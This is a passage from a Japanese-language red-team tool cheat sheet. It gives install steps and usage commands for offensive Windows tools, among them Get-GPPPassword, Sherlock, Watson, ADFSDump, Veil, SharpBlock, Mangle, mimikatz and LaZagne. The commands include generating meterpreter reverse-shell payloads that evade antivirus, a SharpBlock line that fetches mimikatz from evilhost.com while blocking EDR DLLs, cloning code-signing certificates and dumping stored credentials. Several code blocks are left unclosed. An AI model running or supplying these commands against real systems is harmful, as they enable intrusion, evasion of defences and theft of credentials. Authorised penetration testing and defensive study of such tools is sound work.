このツールシートのPowerSploit[インストール手順](https://github.com/A-poc/RedTeam-Tools#powersploit)に従ってください。```bash
powershell.exe -ep bypass
Import-Module PowerSploit
使用方法:```bash
Get-GPPPassword
Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)
ローカル特権昇格の脆弱性に対する不足しているソフトウェアパッチを迅速に見つけるためのPowerShellスクリプト。
_サポート対象:_
- MS10-015 : ユーザーモードからリングへ (KiTrap0D)
- MS10-092 : タスクスケジューラ
- MS13-053 : NTUserMessageCall Win32k カーネルプールオーバーフロー
- MS13-081 : TrackPopupMenuEx Win32k NULL ページ
- MS14-058 : TrackPopupMenu Win32k ヌルポインタ参照
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : フォントドライババッファオーバーフロー
- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : セカンダリログオンハンドル
- MS16-034 : Windows カーネルモードドライバのEoP
- MS16-135 : Win32k 特権昇格
- CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 権限昇格
**インストール: (PowerShell)**```bash
# Git install
git clone https://github.com/rasta-mouse/Sherlock
# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1
使用方法: (PowerShell)```bash
Find-AllVulns
Find-MS14058

_使用された画像: https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/_
### [🔙](#tool-list)[Watson](https://github.com/rasta-mouse/Watson)
Watsonは、不足しているKBを列挙し、特権昇格の脆弱性に対するエクスプロイトを提案するために設計された.NETツールです。
不足しているパッチを特定し、システムでより高い特権を獲得するために既知の脆弱性を悪用するために使用できるエクスプロイトを提案するのに最適です。
**インストール:**
[Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/)を使用して、[Watsonプロジェクトの.sln](https://github.com/rasta-mouse/Watson)を開き、「Release」を選択してビルドします。
**使用方法:**```bash
# Run all checks
Watson.exe

画像のテキストは https://github.com/rasta-mouse/Watson#usage から使用
C# ベースのツールで、ターゲットバイナリにおける DLL ハイジャックの発見と悪用を自動化します。
発見されたハイジャックパスは、攻撃中に EDR を回避するために武器化することができます。
インストール:
注意: i と ii の前提条件は、ImpulsiveDLLHijack.exe 自体のディレクトリに配置する必要があります。
ビルドとセットアップ情報:
ImpulsiveDLLHijack
確認用 DLL について:
セットアップ: 確認用 DLL(maldll32 と maldll64)を ImpulsiveDLLHijack.exe のディレクトリにコピーし、ImpulsiveDLLHijack.exe を実行します :))
インストール手順は https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites から
使用方法:```bash
ImpulsiveDLLHijack.exe -h
ImpulsiveDLLHijack.exe -path BINARY_PATH
使用例は[こちら](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples)をご覧ください。

_https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples より引用した画像_
### [🔙](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump)
AD FS からあらゆる有用な情報をダンプするための C# ツール。
Mandiant FireEye 在籍時の Doug Bienstock [@doughsec](https://twitter.com/doughsec) によって作成されました。
このツールは ADFSpoof と組み合わせて使用するように設計されています。ADFSdump は、ADFSpoof を使用してセキュリティトークンを生成するために必要なすべての情報を出力します。
**必要条件:**
- ADFSDump は、AD FS サービスアカウントのユーザーコンテキストで実行する必要があります。この情報は、AD FS サーバーでプロセス一覧を実行するか、Get-ADFSProperties コマンドレットの出力から取得できます。構成データベースにアクセスするために必要なアクセス許可を持っているのは、AD FS サービスアカウントだけです。DA でさえアクセスできません。
- ADFSDump は、サービスが Windows Internal Database (WID) を使用するように構成されていることを前提としています。外部 SQL サーバーをサポートすることは簡単ですが、現時点ではこの機能は存在しません。
- ADFSDump は AD FS サーバー上でローカルに実行する必要があり、AD FS Web アプリケーションプロキシでは実行できません。WID は名前付きパイプを介してローカルからのみアクセスできます。
**インストール: (コンパイル)**
ADFSDump は Visual Studio 2017 Community Edition を使用して .NET 4.5 に対してビルドされました。プロジェクトの .sln ファイルを開き、"Release" を選択してビルドするだけです。
**使用方法: (フラグ)**```bash
# The Active Directory domain to target. Defaults to the current domain.
/domain:
# The Domain Controller to target. Defaults to the current DC.
/server:
# Switch. Toggle to disable outputting the DKM key.
/nokey
# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.
/database
Blog - ADFSに対するGolden SAML攻撃の探求

画像は https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs から使用
PowerShell v2.0+互換のPowerShellコマンドおよびスクリプト難読化ツールです。犠牲となるエンドポイントがPowerShellを実行できる場合、このツールは高度に難読化されたスクリプトを作成するのに最適です。
インストール:```bash git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
**使用法:**```bash
./Invoke-Obfuscation

Veilは、一般的なアンチウイルスソリューションを回避するmetasploitペイロードを生成するためのツールです。
難読化されたシェルコードの生成に使用できます。詳細については、公式のveil framework ブログを参照してください。
インストール: (Kali)```bash apt -y install veil /usr/share/veil/config/setup.sh --force --silent
**インストール: (Git)**```bash
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent
使用方法:```bash
./Veil.py -t Ordnance --list-payloads
./Veil.py -t Ordnance --list-encoders
./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234
./Veil.py -t Evasion --list-payloads
./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris
Veilの作成者は、オードナンスと回避のコマンドライン使用法について詳しく説明した[ブログ記事](https://www.veil-framework.com/veil-command-line-usage/)を公開しています。

### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)
エントリポイントの実行を防ぐことで、EDRのアクティブなプロジェクションDLLをバイパスする手法。
**特徴:**
- EDR DLLのエントリポイント実行をブロックし、EDRフックが配置されるのを防ぎます。
- 実行時にAmsi.dllのコードパッチを探すスキャナーから検出不可能な、パッチレスAMSIバイパス。
- ディスク、HTTP、または名前付きパイプ(Cobalt Strike)からロード可能なインプラントPEに置き換えられるホストプロセス。
- インプラントされたプロセスは非表示になり、ホロー化されたプロセスを探すスキャナーを回避するのに役立ちます。
- コマンドライン引数は偽装され、ステルスなEDR検出方法を使用してプロセス作成後にインプラントされます。
- パッチレスETWバイパス。
- 呼び出し先がブロックされたDLLのアドレス空間の範囲内にある場合、NtProtectVirtualMemoryの呼び出しをブロックします。
**インストール:**
SharpBlockバイナリをコンパイルするには、[Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/)を使用します。
SharpBlockの[プロジェクト .sln](https://github.com/CCob/SharpBlock)を開き、"Release"を選択してビルドします。
**使用方法:**```bash
# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi
PenTestPartnersの素晴らしいブログ記事 こちら.

画像の出典: https://youtu.be/0W9wkamknfM
Alcatrazは、GUI x64バイナリ難読化ツールであり、以下のさまざまなPEファイルを難読化できます:
サポートされている難読化機能の一部は以下の通りです:
インストール: (必要条件)
インストール: https://vcpkg.io/en/getting-started.html```bash vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows
**使用方法:**
GUIを使用してバイナリを難読化する方法:
1. 左上隅の`file`をクリックしてバイナリを読み込みます。
2. `Functions`ツリーを展開して関数を追加します。(上部の検索バーに名前を入力して検索できます)
3. `compile`を押します(**注:** _多くの関数を難読化するには数秒かかることがあります_)

_画像提供: https://github.com/weak1337/Alcatraz_
### [🔙](#tool-list)[Mangle](https://github.com/optiv/Mangle)
Mangleは、コンパイルされた実行可能ファイル(.exeまたはDLL)のさまざまな側面を操作するツールです。
Mangleは、既知の侵害指標(IoC)に基づく文字列を削除してランダムな文字に置き換え、ファイルサイズを増加させてEDRを回避するように変更し、正当なファイルからコード署名証明書をクローンすることができます。
これにより、Mangleはローダーがオンディスクおよびインメモリスキャナーを回避するのに役立ちます。
**インストール:**
最初のステップは、いつも通りリポジトリをクローンすることです。Mangleをコンパイルする前に、依存関係をインストールする必要があります。それらをインストールするには、次のコマンドを実行します:```
go get github.com/Binject/debug/pe
次にビルドしてください``` git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go
**使用方法:**```bash
-C string
Path to the file containing the certificate you want to clone
-I string
Path to the orginal file
-M Edit the PE file to strip out Go indicators
-O string
The new file name
-S int
How many MBs to increase the file by
完全な使用方法はこちらにあります。

画像は https://github.com/optiv/Mangle から引用
AMSI.fail は、現在のプロセスの AMSI を無効化または回避する難読化された PowerShell スニペットを生成する優れたウェブサイトです。
スニペットは、少数のテクニック/バリエーションのプールからランダムに選択され、その後難読化されます。すべてのスニペットは実行時/リクエスト時に難読化されるため、生成された出力に同じシグネチャが共有されることはありません。
AMSI について説明している素晴らしい F-Secure ブログはこちらです。

画像は http://amsi.fail/ から引用
被害者のエンドポイントからハッシュ化および平文のパスワードを取得するための優れたツールです。システムへの特権アクセスを取得したら、このツールをドロップして資格情報を収集します。
インストール:
mimikatz.exe バイナリは x64 フォルダにあります。使用方法:```bash .\mimikatz.exe privilege::debug

### [🔙](#tool-list)[LaZagne](https://github.com/AlessandroZ/LaZagne)
ブラウザ、データベース、ゲーム、メール、git、WiFiなどからローカルに保存されたパスワードを抽出する便利なツールです。
**インストール: (バイナリ)**
スタンドアロンバイナリは[こちら](https://github.com/AlessandroZ/LaZagne/releases/)からインストールできます。
**使用方法:**```bash
# Launch all modes
.\laZagne.exe all
# Launch only a specific module
.\laZagne.exe browsers
# Launch only a specific software script
.\laZagne.exe browsers -firefox